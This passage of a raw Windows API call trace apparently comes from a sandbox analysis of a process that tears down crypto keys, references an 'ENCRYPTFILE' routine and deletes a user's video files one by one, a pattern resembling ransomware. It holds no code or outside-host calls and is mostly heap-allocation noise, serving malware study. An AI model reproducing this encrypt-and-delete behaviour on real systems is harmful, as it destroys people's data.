lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0098.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca640, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0098.329] CryptDestroyKey (hKey=0x41ac700) returned 1 [0098.329] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.330] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0098.330] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0098.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.330] FreeLibrary (hLibModule=0x756e0000) returned 1 [0098.369] CloseHandle (hObject=0x298) returned 1 [0098.370] CloseHandle (hObject=0x258) returned 1 [0098.372] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi", lpFilePart=0x0) returned 0x32 [0098.372] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9zss8crw.avi")) returned 0x20 [0098.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0098.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0098.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0098.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0098.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0098.373] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ba7cc0, ftCreationTime.dwHighDateTime=0x1d5f012, ftLastAccessTime.dwLowDateTime=0xea544c10, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xea544c10, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0xa962, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9zsS8CRW.avi", cAlternateFileName="")) returned 0x41ac6c0 [0098.373] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9zss8crw.avi")) returned 1 [0098.426] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ba7cc0, ftCreationTime.dwHighDateTime=0x1d5f012, ftLastAccessTime.dwLowDateTime=0xea544c10, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xea544c10, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0xa962, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9zsS8CRW.avi", cAlternateFileName="")) returned 0 [0098.426] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0098.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0098.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.428] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.428] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.428] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0098.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0098.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0098.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0098.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0098.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a0e0 | out: hHeap=0x1780000) returned 1 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0098.430] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0098.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0098.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0098.430] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0098.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0098.430] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd412f2b0, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0x3ad28a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x3ad28a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x13b08, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="E8Q4uNIBQS8v.flv", cAlternateFileName="E8Q4UN~1.FLV")) returned 0x41ac500 [0098.431] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0098.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0098.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0098.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0098.431] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0098.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0098.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0098.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0098.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0098.432] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0098.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0098.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0098.432] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0098.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0098.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0098.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0098.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0098.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0098.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0098.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0098.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0098.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0098.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0098.435] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.435] RtlAllocateHeap (HeapHandle=0x1780000, 